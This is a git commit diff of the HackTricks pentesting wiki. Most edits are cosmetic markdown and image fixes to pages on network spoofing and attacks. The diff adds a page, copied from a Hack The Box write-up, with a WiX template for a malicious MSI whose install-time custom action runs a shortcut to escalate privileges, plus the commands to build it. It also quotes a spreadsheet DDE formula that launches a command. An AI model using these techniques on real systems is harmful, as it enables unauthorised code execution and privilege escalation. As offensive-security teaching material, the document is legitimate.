GitBook: [master] 431 pages and 8 assets modified

2024-11-22 04:33:28 +00:00 · 2021-01-24 10:03:34 +00:00 · 2021-01-24 10:03:34 +00:00 · a36d286d74
commit a36d286d74
parent 48f2a41b5e
10 changed files with 79 additions and 20 deletions
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/1911-pentesting-fox.md
+++ b/1911-pentesting-fox.md
@ -10,7 +10,7 @@ dht udp "DHT Nodes"

 ![](.gitbook/assets/image%20%28182%29.png)

-![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
+![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%281%29%20%282%29.png)

 InfluxDB

--- a/SUMMARY.md
+++ b/SUMMARY.md
@ -52,6 +52,7 @@
 * [Checklist - Local Windows Privilege Escalation](windows/checklist-windows-privilege-escalation.md)
 * [Windows Local Privilege Escalation](windows/windows-local-privilege-escalation/README.md)
  * [AppendData/AddSubdirectory permission over service registry](windows/windows-local-privilege-escalation/appenddata-addsubdirectory-permission-over-service-registry.md)
+  * [Create MSI with WIX](windows/windows-local-privilege-escalation/create-msi-with-wix.md)
  * [DPAPI - Extracting Passwords](windows/windows-local-privilege-escalation/dpapi-extracting-passwords.md)
  * [SeImpersonate from High To System](windows/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md)
  * [Access Tokens](windows/windows-local-privilege-escalation/access-tokens.md)
--- a/pentesting-web/formula-injection.md
+++ b/pentesting-web/formula-injection.md
@ -41,5 +41,5 @@ The good news is that **this payload is executed automatically when the file is

 It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`**

-![](../.gitbook/assets/image%20%2825%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%281%29.png)
+![](../.gitbook/assets/image%20%2825%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%281%29%20%281%29.png)

--- a/pentesting/pentesting-network/README.md
+++ b/pentesting/pentesting-network/README.md
@ -1,8 +1,8 @@
 # Pentesting Network

-If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, ****join the [💬](https://emojipedia.org/speech-balloon/) ****[**PEASS & HackTricks telegram group here**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**  
-If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.  
-Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
+If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) ****[**PEASS & HackTricks telegram group here**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**  
+If you want to **share some tricks with the community** you can also submit **pull requests** to **\*\*\[**[https://github.com/carlospolop/hacktricks\*\*\]\(https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks)\) **\*\*that will be reflected in this book.  
+Don't forget to** give ⭐ on the github\*\* to motivate me to continue developing this book.

 ## Discovering hosts from the outside

@ -398,7 +398,6 @@ Pre-scan script results:
 |     Domain Name Server: 192.168.1.1
 |_    Domain Name: mynet
 Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds
-
 ```

 **DoS**
@ -430,7 +429,7 @@ You can use Responder DHCP script  \(_/usr/share/responder/DHCP.py_\) to establi
 | Secondary DNS server IP address \(optional\) | _-s 10.0.0.1_ |
 | The netmask of the local network | _-n 255.255.255.0_ |
 | The interface to listen for DHCP traffic on | _-I eth1_ |
-| WPAD configuration address \(URL\) | _-w “http://10.0.0.100/wpad.dat\n”_ |
+| WPAD configuration address \(URL\) | _-w “_[http://10.0.0.100/wpad.dat\n”](http://10.0.0.100/wpad.dat\n”) |
 | Spoof the default gateway IP address | -S |
 | Respond to all DHCP requests \(very noisy\) | -R |

@ -439,7 +438,7 @@ You can use Responder DHCP script  \(_/usr/share/responder/DHCP.py_\) to establi
 Here are some of the attack tactics that can be used against 802.1X implementations:

 * Active brute-force password grinding via EAP
-* Attacking the RADIUS server with malformed EAP content ****\(exploits\)
+* Attacking the RADIUS server with malformed EAP content _\*\*_\(exploits\)
 * EAP message capture and offline password cracking \(EAP-MD5 and PEAP\)
 * Forcing EAP-MD5 authentication to bypass TLS certificate validation
 * Injecting malicious network traffic upon authenticating using a hub or similar
@ -466,7 +465,7 @@ For more information about how to attack this protocol go to the book _**Network

 #### EIGRP

-The Enhanced Interior Gateway Routing Protocol \(EIGRP\) is Cisco proprietary and can be run with or without authentication. __[Coly](https://code.google.com/p/coly/) supports capture of EIGRP broadcasts and injection of packets to manipulate routing configuration.
+The Enhanced Interior Gateway Routing Protocol \(EIGRP\) is Cisco proprietary and can be run with or without authentication. \_\_[Coly](https://code.google.com/p/coly/) supports capture of EIGRP broadcasts and injection of packets to manipulate routing configuration.

 For more information about how to attack this protocol go to the book _**Network Security Assessment: Know Your Network \(3rd edition\).**_

@ -478,7 +477,7 @@ For more information about how to attack this protocol go to the book _**Network

 _\*\*\*\*_

-You can find some more information about network attacks [here](https://github.com/Sab0tag3d/MITM-cheatsheet). _****\(TODO: Read it all and all new attacks if any\)_
+You can find some more information about network attacks [here](https://github.com/Sab0tag3d/MITM-cheatsheet). _\*\*\(TODO: Read it all and all new attacks if any\)_

 ## **Spoofing**

@ -545,7 +544,7 @@ Read here more information about [how to Impersonate services with Responder](sp

 ### [Spoofing WPAD](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)

-Many browsers use Web Proxy Auto-Discovery \(WPAD\) to load proxy settings from the network. A WPAD server provides client proxy settings via a particular URL \(e.g., _http://wpad.example.org/wpad.dat_\) upon being identified through any of the following:
+Many browsers use Web Proxy Auto-Discovery \(WPAD\) to load proxy settings from the network. A WPAD server provides client proxy settings via a particular URL \(e.g., [http://wpad.example.org/wpad.dat](http://wpad.example.org/wpad.dat)\) upon being identified through any of the following:

 * DHCP, using a code 252 entry[34](https://learning.oreilly.com/library/view/Network+Security+Assessment,+3rd+Edition/9781491911044/ch05.html#ch05fn41)
 * DNS, searching for the _wpad_ hostname in the local domain
@ -612,7 +611,7 @@ More info [here](https://www.blackhat.com/presentations/bh-dc-09/Marlinspike/Bla
 The **difference** between **sslStrip+ and dns2proxy** against **sslStrip** is that they will **redirect** for example _**www.facebook.com**_ **to** _**wwww.facebook.com**_ \(note the **extra** "**w**"\) and will set the **address of this domain as the attacker IP**. This way, the **client** will **connect** to _**wwww.facebook.com**_ **\(the attacker\)** but behind the scenes **sslstrip+** will **maintain** the **real connection** via https with **www.facebook.com**.

 The **goal** of this technique is to **avoid HSTS** because _**wwww**.facebook.com_ **won't** be saved in the **cache** of the browser, so the browser will be tricked to perform **facebook authentication in HTTP**.  
-Note that in order to perform this attack the victim has to try to access initially to http://www.faceook.com and not https. This can be done modifying the links inside an http page.
+Note that in order to perform this attack the victim has to try to access initially to [http://www.faceook.com](http://www.faceook.com) and not https. This can be done modifying the links inside an http page.

 More info [here](https://www.bettercap.org/legacy/#hsts-bypass), [here](https://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014) and [here](https://security.stackexchange.com/questions/91092/how-does-bypassing-hsts-with-sslstrip-work-exactly).

--- a/windows/windows-local-privilege-escalation/README.md
+++ b/windows/windows-local-privilege-escalation/README.md
@ -227,6 +227,10 @@ Read this tutorial to learn how to create a MSI wrapper using this tools. Note t

 {% page-ref page="msi-wrapper.md" %}

+### Create MSI with WIX
+
+{% page-ref page="create-msi-with-wix.md" %}
+
 ### MSI Installation

 To execute the **installation** of the **malicious `.msi`** file in **background:**
--- a/windows/windows-local-privilege-escalation/create-msi-with-wix.md
+++ b/windows/windows-local-privilege-escalation/create-msi-with-wix.md
@ -0,0 +1,55 @@
+# Create MSI with WIX
+
+**Tutorial copied from** [**https://0xrick.github.io/hack-the-box/ethereal/\#Creating-Malicious-msi-and-getting-root**](https://0xrick.github.io/hack-the-box/ethereal/#Creating-Malicious-msi-and-getting-root)  
+In order to create the msi we will use [wixtools](http://wixtoolset.org/) , you can use other msi builders but they didn’t work for me.  
+Check [this page](https://www.codeproject.com/Tips/105638/A-quick-introduction-Create-an-MSI-installer-with) for some wix msi usage examples.  
+We will create an msi that executes our lnk file :
+
+```markup
+<?xml version="1.0"?>
+<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
+<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name"
+Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
+<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
+<Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
+<Directory Id="TARGETDIR" Name="SourceDir">
+<Directory Id="ProgramFilesFolder">
+<Directory Id="INSTALLLOCATION" Name="Example">
+<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
+</Component>
+</Directory>
+</Directory>
+</Directory>
+<Feature Id="DefaultFeature" Level="1">
+<ComponentRef Id="ApplicationFiles"/>
+</Feature>
+<Property Id="cmdline">cmd.exe /C "c:\users\public\desktop\shortcuts\rick.lnk"</Property>
+<CustomAction Id="Stage1" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore"
+Impersonate="yes"/>
+<CustomAction Id="Stage2" Execute="deferred" Script="vbscript" Return="check">
+fail_here
+</CustomAction>
+<InstallExecuteSequence>
+<Custom Action="Stage1" After="InstallInitialize"></Custom>
+<Custom Action="Stage2" Before="InstallFiles"></Custom>
+</InstallExecuteSequence>
+</Product>
+</Wix>
+```
+
+ We will use `candle.exe` from wixtools to create a wixobject from `msi.xml`
+
+```markup
+candle.exe -out C:\tem\wix C:\tmp\Ethereal\msi.xml
+```
+
+![](https://0xrick.github.io/images/hackthebox/ethereal/65.png)
+
+Then we will use `light.exe` to create the msi file from the wixobject:
+
+```markup
+light.exe -out C:\tm\Ethereal\rick.msi C:\tmp\wix
+```
+
+![](https://0xrick.github.io/images/hackthebox/ethereal/66.png)
+